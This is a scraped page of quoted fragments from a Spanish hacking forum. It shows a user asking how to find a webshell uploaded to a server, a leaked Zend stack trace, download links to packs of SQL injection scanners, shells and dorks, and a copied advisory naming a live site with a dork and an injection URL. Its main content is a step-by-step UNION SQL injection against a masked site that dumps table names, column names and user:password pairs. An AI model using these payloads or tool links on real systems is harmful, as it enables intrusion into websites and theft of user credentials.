Tengo acceso a un servidor en el que puedo subir una webshell, pero una vez subida no la encuentro, he probado nikto y dirbuster.
Alguien puede ayudarme? la idea es crear un videotuto
Alguien puede ayudarme? la idea es crear un videotuto
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCitarAn error occurred
Page not found
Exception information:
Message: Invalid controller specified (asdf)
Stack trace:
#0 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))
#1 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Application/Bootstrap/Bootstrap.php(97): Zend_Controller_Front->dispatch()
#2 /var/www/vhosts/XXXXXXXXX.com/httpdocs/library/Zend/Application.php(366): Zend_Application_Bootstrap_Bootstrap->run()
#3 /var/www/vhosts/XXXXXXXX.com/httpdocs/index.php(71): Zend_Application->run()
#4 {main}
Request Parameters:
array (
'controller' => 'asdf',
'action' => 'index',
'module' => 'default',
CitarSQLI SCANNER PACK : http://www.mediafire.com/download.php?fer74n4rlxwf3uc
MD5 tools pack : http://www.mediafire.com/download.php?f14s7tpc9zyos7s
ADMIN FINDR : http://www.mediafire.com/download.php?ye0fx80wzjni1z9
SQLI TUTORIAL PACK : http://www.mediafire.com/download.php?mup5itjeu391fcy
DORKS PACK : http://www.mediafire.com/download.php?c8w4chtjcak4i7y
SHELLS PACK : http://www.mediafire.com/download.php?ce6ka8vcd875nog
MISC UTILITIE PACK : http://www.mediafire.com/download.php?eo8j5w3zyyv28qp
Citar**********************************************fuente: http://packetstormsecurity.org/files/view/104643/arsolutions-sql.txt
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******
autor==>ruben_linux
equipo=>ruben_linux
- DORK: "AR SOLUTIONS" inurl:viewnews.php?id=
- URL: http://bestfan.com/viewnews.php?id=[sqli]
- EJEMPLO:
http://bestfan.com/viewnews.php?id=253+and+1=0+1,2,3,4,5,6,7,8,9,10,11,12--
***********************************************
******************ruben_linux******************
***********************************************
Citarmethod="GET"
Citarif (cod.length != 16){
CitarQué es "var"?
Citarprueba (Zona 0)
Cita de: WarGhost en 26 Agosto 2011, 02:54 AM
A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió.
Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+1--
Citarhttp://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--
Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--
Citarhttp://www.xxxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass